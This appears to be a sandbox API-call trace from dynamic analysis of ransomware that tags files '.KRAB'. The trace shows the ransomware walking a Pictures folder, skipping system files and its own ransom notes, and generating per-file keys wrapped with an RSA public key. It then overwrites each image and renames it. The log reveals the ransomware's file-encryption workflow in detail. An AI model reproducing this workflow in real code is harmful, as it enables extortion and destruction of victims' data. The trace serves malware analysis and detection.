0xa [0097.624] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.625] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\d2ca4a08d2ca4dee3d.lock") returned 83 [0097.625] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0097.627] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.628] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.628] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\") returned 60 [0097.628] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\*" [0097.628] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd3e0 [0097.628] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0097.628] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.628] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0097.628] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0097.628] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.628] lstrcmpW (lpString1="2taJDfZve.gif", lpString2=".") returned 1 [0097.628] lstrcmpW (lpString1="2taJDfZve.gif", lpString2="..") returned 1 [0097.628] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="2taJDfZve.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif" [0097.628] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.628] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif.KRAB") returned 78 [0097.628] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif") returned 73 [0097.628] lstrlenW (lpString=".gif") returned 4 [0097.628] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.629] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.629] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.629] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif") returned 73 [0097.629] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif") returned 73 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="desktop.ini") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="autorun.inf") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="ntuser.dat") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="iconcache.db") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="bootsect.bak") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="boot.ini") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="ntuser.dat.log") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="thumbs.db") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="CRAB-DECRYPT.txt") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="ntldr") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="NTDETECT.COM") returned -1 [0097.629] lstrcmpiW (lpString1="2taJDfZve.gif", lpString2="Bootfont.bin") returned -1 [0097.629] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.629] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10113d0) returned 1 [0097.630] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.630] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.630] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.630] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.630] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.630] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.630] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10113d0) returned 1 [0097.631] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.631] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.631] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.631] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.631] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.631] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.631] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011458) returned 1 [0097.632] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.632] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.632] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.632] GetLastError () returned 0x0 [0097.632] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.632] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0097.632] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010f08) returned 1 [0097.633] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.633] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.633] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.633] GetLastError () returned 0x0 [0097.633] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.633] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0097.633] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\2tajdfzve.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.633] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.634] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.634] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xaab2, lpOverlapped=0x0) returned 1 [0097.644] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffff554e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.644] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xaab2, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xaab2, lpOverlapped=0x0) returned 1 [0097.645] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.645] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.647] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.648] CloseHandle (hObject=0x778) returned 1 [0097.648] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.648] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\2tajdfzve.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\2taJDfZve.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\2tajdfzve.gif.krab")) returned 1 [0097.649] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.649] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.649] lstrcmpW (lpString1="cBvo6QF.bmp", lpString2=".") returned 1 [0097.649] lstrcmpW (lpString1="cBvo6QF.bmp", lpString2="..") returned 1 [0097.649] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="cBvo6QF.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp" [0097.649] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.649] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp.KRAB") returned 76 [0097.649] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp") returned 71 [0097.649] lstrlenW (lpString=".bmp") returned 4 [0097.649] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.649] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.649] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.650] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp") returned 71 [0097.650] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp") returned 71 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="desktop.ini") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="autorun.inf") returned 1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="ntuser.dat") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="iconcache.db") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="bootsect.bak") returned 1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="boot.ini") returned 1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="ntuser.dat.log") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="thumbs.db") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="CRAB-DECRYPT.txt") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="ntldr") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="NTDETECT.COM") returned -1 [0097.650] lstrcmpiW (lpString1="cBvo6QF.bmp", lpString2="Bootfont.bin") returned 1 [0097.650] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.650] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10112c0) returned 1 [0097.650] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.651] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.651] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.651] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.651] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0097.651] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.651] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10113d0) returned 1 [0097.651] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.652] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.652] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.652] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.652] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.652] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.652] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.653] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.653] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.653] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.653] GetLastError () returned 0x0 [0097.653] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.653] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.653] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.653] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.653] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.653] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.654] GetLastError () returned 0x0 [0097.654] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.654] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.654] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\cbvo6qf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.654] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.654] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.654] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x1276e, lpOverlapped=0x0) returned 1 [0097.667] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffed892, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.667] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1276e, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x1276e, lpOverlapped=0x0) returned 1 [0097.667] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.667] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.670] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.670] CloseHandle (hObject=0x778) returned 1 [0097.670] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.671] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\cbvo6qf.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\cBvo6QF.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\cbvo6qf.bmp.krab")) returned 1 [0097.671] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.671] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.671] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0097.671] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0097.671] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\d2ca4a08d2ca4dee3d.lock" [0097.672] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.672] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 88 [0097.672] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\d2ca4a08d2ca4dee3d.lock") returned 83 [0097.672] lstrlenW (lpString=".lock") returned 5 [0097.672] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.672] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0097.672] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.672] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.672] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.672] lstrcmpW (lpString1="ge OT78oguT7pNV.bmp", lpString2=".") returned 1 [0097.672] lstrcmpW (lpString1="ge OT78oguT7pNV.bmp", lpString2="..") returned 1 [0097.673] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="ge OT78oguT7pNV.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp" [0097.673] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.673] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp.KRAB") returned 84 [0097.673] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp") returned 79 [0097.673] lstrlenW (lpString=".bmp") returned 4 [0097.673] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.673] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.673] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.673] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp") returned 79 [0097.673] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp") returned 79 [0097.673] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="desktop.ini") returned 1 [0097.673] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="autorun.inf") returned 1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="ntuser.dat") returned -1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="iconcache.db") returned -1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="bootsect.bak") returned 1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="boot.ini") returned 1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="ntuser.dat.log") returned -1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="thumbs.db") returned -1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="ntldr") returned -1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="NTDETECT.COM") returned -1 [0097.674] lstrcmpiW (lpString1="ge OT78oguT7pNV.bmp", lpString2="Bootfont.bin") returned 1 